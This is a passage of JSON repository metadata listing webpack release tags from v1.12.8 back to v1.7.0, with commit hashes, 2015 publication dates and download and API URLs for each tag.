v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"ht